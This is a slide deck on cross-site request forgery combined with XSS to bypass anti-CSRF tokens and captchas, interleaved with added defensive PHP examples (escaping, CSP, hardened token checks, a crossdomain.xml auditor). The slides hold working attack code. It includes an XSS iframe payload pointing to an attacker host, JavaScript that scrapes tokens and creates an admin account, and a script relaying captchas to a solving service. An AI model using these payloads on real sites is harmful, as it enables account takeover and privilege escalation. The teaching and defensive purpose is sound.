Cross Site Request Forgery Attacks


  1. Cross Site Request Forgery Attacks: security token bypass, captcha bypass. Presented by Vlad Horatiu [email_address]
  2. What is CSRF
  3. Context
     • We have:
       • Access to a web site the victim may visit
       • Cross Site Scripting (XSS) on the domain where the victim has elevated privileges
  4. Basic principle
     • The victim visits the site we control
     • Through JavaScript, the victim sends requests to the location where they have access, via XSS.
  5. Why do we need XSS?
     • Modern browsers allow AJAX requests, and access to a page's HTML source, only as long as both the request and its target are on the same domain.
     • This protection only restricts access to the source of a page from another domain; it has no effect on loading that page (e.g. in an iframe)
     • Why?
       • Security
       • Implications for web advertising
       • Security
  6. Starting the attack
     • Iframe from the site we control to the one with XSS

       <html>
       <iframe src="http://victimsite.com/index.php?xss=<script>document.write('<iframe src='http://attacker');</script>" width="50" height="50" style="filter: alpha(opacity=0);-moz-opacity:0;opacity: .0;">
       </iframe>
       </html>
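The iframe on slide 6 only works because the framed index.php echoes its xss parameter straight into the page. As an added example (not code from the slides), here is a hypothetical index.php that shows that unsafe rendering next to the escaped version, plus a Content-Security-Policy header as a second layer; the function names, the sample input and the policy values are my assumptions.

```php
<?php
// Added example, not code from the slides: a hypothetical index.php that shows
// the unsafe rendering the slide-6 payload relies on next to the escaped form,
// plus a Content-Security-Policy header. Names and policy values are assumptions.
declare(strict_types=1);

// Unsafe: the raw query parameter is placed into HTML, so a <script> or <iframe>
// inside the xss parameter is parsed as markup and executed.
function render_unsafe(string $param): string
{
    return '<p>You searched for: ' . $param . '</p>';
}

// Safe for an HTML text context: <, >, &, " and ' are encoded, so the payload
// is displayed as literal text instead of being parsed as markup.
function render_escaped(string $param): string
{
    return '<p>You searched for: ' . htmlspecialchars($param, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// Defence in depth: without 'unsafe-inline' an injected inline <script> does not run,
// frame-src 'self' blocks the injected iframe to the attacker's host, and
// frame-ancestors 'self' stops another origin from framing this site at all.
function security_headers(): array
{
    return [
        'Content-Security-Policy' =>
            "default-src 'self'; script-src 'self'; frame-src 'self'; frame-ancestors 'self'",
        'X-Content-Type-Options' => 'nosniff',
    ];
}

// Constructed sample input with the shape of the slide-6 payload.
$sample = "<script>document.write('<iframe src=http://attacker>');</script>";

if (PHP_SAPI === 'cli') {
    // Run as `php index.php`: the escaped output contains no executable markup.
    echo render_escaped($sample), PHP_EOL;
} else {
    foreach (security_headers() as $name => $value) {
        header($name . ': ' . $value);
    }
    echo render_escaped((string) ($_GET['xss'] ?? ''));
}
```

Output encoding has to match the context the value lands in: htmlspecialchars() covers HTML text and attribute values, but a value written into a script block or a URL needs its own encoding. The CSP is not a substitute for escaping; it limits the damage when an injection slips through.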
  7. Login check

       function check() {
           $.get("login.html", function(data){
               if(data.indexOf('blanaa') != -1) {
                   var logged = tryToLogin();
               } else {
                   var logged = true;
               }
           });
       };
       function tryToLogin() {
           $.get("login.html", function(data){
               $('#form_frame').contents().find('form').submit();
               return (data.indexOf('blanaa') != -1);
           });
       }
  8. Token bypass
     • Classic CSRF attack URL:
       • http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned
     • Valid link when a token protection is in place:
       • http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned&token=693a93e07e1032751a2f14d00e33a56f
     • Code snippets (PHP):
       • Token generation:

           mysql_query("INSERT INTO `user_tokens` (`user_id`, `user_token`) VALUES ('". intval($uid) ."', '". sha1(mt_rand(1000000, 9999999).microtime(true)) ."')");

       • Token validation:

           $query = mysql_query("SELECT `user_token` FROM `user_tokens` WHERE `id` = '". intval($uid) ."' LIMIT 1");
           $token = getQueryToken($query);
           if($_COOKIE['token'] != $token)
               die('Esti un bulangiu!');
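Two things in the slide-8 snippet deserve a defender's attention: the token is derived from mt_rand() and microtime(), neither of which is unpredictable, and the check compares the stored token with $_COOKIE['token'], which the browser attaches to every cross-site request anyway, so a forged request passes the check without the attacker ever learning the token. As an added example (not the slides' code), here is a hardened version that keeps one CSPRNG token per session, expects it in the POST body, compares it in constant time and also checks the Origin header; the constant ALLOWED_ORIGIN, the function names and the session layout are my assumptions.

```php
<?php
// Added example, not code from the slides: CSRF token handling that avoids the
// weaknesses in the slide-8 snippet. Assumes PHP >= 7 (random_bytes, hash_equals),
// PHP sessions, and a hypothetical ALLOWED_ORIGIN for the site's own origin.
declare(strict_types=1);

const ALLOWED_ORIGIN = 'https://victimsite.com'; // the site's own origin (assumed)

// One token per session from a CSPRNG; mt_rand()/microtime() values are guessable.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// The hidden field a form embeds so the token travels in the POST body.
function csrf_hidden_field(): string
{
    return '<input type="hidden" name="token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

// Validate a state-changing request. The token must come from the request body,
// never from a cookie: cookies are sent automatically with cross-site requests,
// so a cookie-vs-database comparison accepts any forged request.
function csrf_request_is_valid(array $post, array $server, ?string $sessionToken): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false; // a GET with side effects is forgeable with a plain <img> or <iframe>
    }
    // Origin (or Referer as a fallback) must match the site's own origin.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin === null && isset($server['HTTP_REFERER'])) {
        $p = parse_url($server['HTTP_REFERER']);
        if ($p !== false && isset($p['scheme'], $p['host'])) {
            $origin = $p['scheme'] . '://' . $p['host'] . (isset($p['port']) ? ':' . $p['port'] : '');
        }
    }
    if ($origin !== ALLOWED_ORIGIN) {
        return false;
    }
    if ($sessionToken === null || !isset($post['token']) || !is_string($post['token'])) {
        return false;
    }
    // Constant-time comparison; the loose != in the slide also type-juggles.
    return hash_equals($sessionToken, $post['token']);
}

// Usage in a handler such as add_admin.php (assumed):
//   session_start();
//   if (!csrf_request_is_valid($_POST, $_SERVER, $_SESSION['csrf_token'] ?? null)) {
//       http_response_code(403);
//       exit('invalid request');
//   }

if (PHP_SAPI === 'cli') {
    // Constructed requests for a local run: a same-origin POST with the token,
    // a cross-origin POST carrying the right token, and a POST without one.
    $token  = bin2hex(random_bytes(32));
    $same   = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => ALLOWED_ORIGIN];
    $forged = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker'];
    var_dump(csrf_request_is_valid(['token' => $token], $same, $token));
    var_dump(csrf_request_is_valid(['token' => $token], $forged, $token));
    var_dump(csrf_request_is_valid([], $same, $token));
}
```

Set the session cookie with session_set_cookie_params(['samesite' => 'Lax', 'secure' => true, 'httponly' => true]) (PHP 7.3 and later) so that the browser does not attach it to cross-site POSTs in the first place. None of this helps against the next two slides: script running on the same origin through XSS can read the token like any other page content, which is why fixing the XSS comes first on the prevention list.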
  9. Token bypass
     • JavaScript token crawler

       function addAdmin() {
           $.get("http://victimsite.com/admin/add_user.php", function(data){
               var token = getBetween('&token=', '&', data);
               alert(token);
               $.get("http://victimsite.com/admin/add_user_success.php?user=1337hacker&pass=pwned&token=" + token, function(data){
               });
           });
       };
       function getBetween(lft, rgt, string) {
           var split = '';
           split = string.split('&token=');
           split = split[1];
           split = split.split('&');
           split = split[0];
           return split;
       }
  10. Token bypass
     • JavaScript token crawler (POST)

       function addAdmin() {
           $.get("http://victimsite.com/admin/add_user.php", function(data){
               var token = getBetween('type="hidden" name="token" value="', '"', data);
               $.post("http://victimsite.com/admin/add_user.php",
                   { user: "1337hacker", pass: "pwned", token: token },
                   function(data) {});
           });
       };
       function getBetween(lft, rgt, string) {
           var split = '';
           split = string.split('&token=');
           split = split[1];
           split = split.split('&');
           split = split[0];
           return split;
       }
  11. Token bypass
     • Prevention methods
       • Protection against XSS attacks
       • Requiring a captcha for high-risk operations
       • Requiring the password for high-risk operations
       • Using Private Browsing
       • Giving sessions a relatively short expiration time
       • Writing the token in a way that is hard for a script to parse (e.g. through obfuscated JavaScript)
  12. Token bypass
     • Disadvantages
       • Sensitive to changes in the HTML structure
  13. Flash cross-domain policy
     • Lets us make AJAX requests between two different domains
     • The destination domain must list the source domain in a "whitelist": crossdomain.xml
     • Example crossdomain.xml:

       <cross-domain-policy>
       <allow-access-from domain="*"/>
       </cross-domain-policy>
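The policy on slide 13 is the setting that makes the captcha bypass on the next slides possible: with domain="*", Flash content served from any origin could read responses from victimsite.com with the victim's cookies attached. As an added example (not from the slides), here is a small PHP audit that parses a crossdomain.xml and reports the permissive entries, run against the slide's policy and a constructed restrictive one; the function name, the findings text and the sample partner domain are my assumptions.

```php
<?php
// Added example, not code from the slides: audits a crossdomain.xml for the
// permissive settings shown on slide 13. Findings text and samples are constructed.
declare(strict_types=1);

function audit_crossdomain_policy(string $xml): array
{
    $findings = [];
    $prev = libxml_use_internal_errors(true);
    $doc = simplexml_load_string($xml);
    libxml_use_internal_errors($prev);
    if ($doc === false) {
        return ['policy is not well-formed XML'];
    }
    foreach ($doc->{'allow-access-from'} as $rule) {
        $domain = (string) $rule['domain'];
        // Flash treated a missing secure attribute as secure="true".
        $secure = isset($rule['secure']) ? (string) $rule['secure'] : 'true';
        if ($domain === '*') {
            $findings[] = 'allow-access-from domain="*": any origin may read responses';
        } elseif (strpos($domain, '*') !== false) {
            $findings[] = 'wildcard domain "' . $domain . '": every matching subdomain is trusted';
        }
        if ($secure === 'false') {
            $findings[] = 'domain "' . $domain . '" with secure="false": plain-HTTP origins are trusted';
        }
    }
    foreach ($doc->{'allow-http-request-headers-from'} as $rule) {
        if ((string) $rule['domain'] === '*') {
            $findings[] = 'allow-http-request-headers-from domain="*": any origin may send custom headers';
        }
    }
    return $findings;
}

// Constructed samples: the policy from the slide, then a restrictive replacement
// that trusts one named HTTPS partner and forbids policy files elsewhere on the site.
$weak = '<cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>';
$tight = '<cross-domain-policy>'
    . '<site-control permitted-cross-domain-policies="master-only"/>'
    . '<allow-access-from domain="partner.example.com" secure="true"/>'
    . '</cross-domain-policy>';

print_r(audit_crossdomain_policy($weak));
print_r(audit_crossdomain_policy($tight));
```

A site that does not serve Flash content at all should not publish a crossdomain.xml; where one is needed, it should name specific HTTPS origins and use site-control with permitted-cross-domain-policies="master-only" so that a policy file uploaded elsewhere on the host cannot widen the trust.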
  14. Captcha bypass
     • Context
       • The user's username and password fields are already filled in, thanks to autocomplete
       • The login form requires captcha verification
     • Basic principle
       • Grabbing the image path via JavaScript
       • Sending the image to a captcha-breaking script (via crossdomain.xml)
       • Sending the login information
  15. Captcha bypass
     • Captcha breaking script snippet:

       $rand = sha1(mt_rand(1000000, 9999999).microtime(true));
       if(isset($_GET['path']))
           file_put_contents($rand.'.jpg', file_get_contents($_GET['path']));
       if ($captcha = $client->upload($rand.'.jpg')) {
           echo "CAPTCHA {$captcha['captcha']} uploaded\n";
           sleep(DeathByCaptcha_Client::DEFAULT_TIMEOUT);
           if ($text = $client->get_text($captcha['captcha'])) {
               echo $text;
           } else {
               $client->remove($captcha['captcha']);
               echo '0';
           }
       }
  16. Captcha bypass
     • Disadvantages
       • The long time needed to solve the captcha
         • For the method to work, the user would have to stay on the page for at least a minute
       • The high cost of captcha solving
       • Changes in the HTML structure
       • Flash Player must be present on the victim's system
  17. Concrete examples
     • Adding users to a WordPress platform
     • Adding a MySQL user
  18. Questions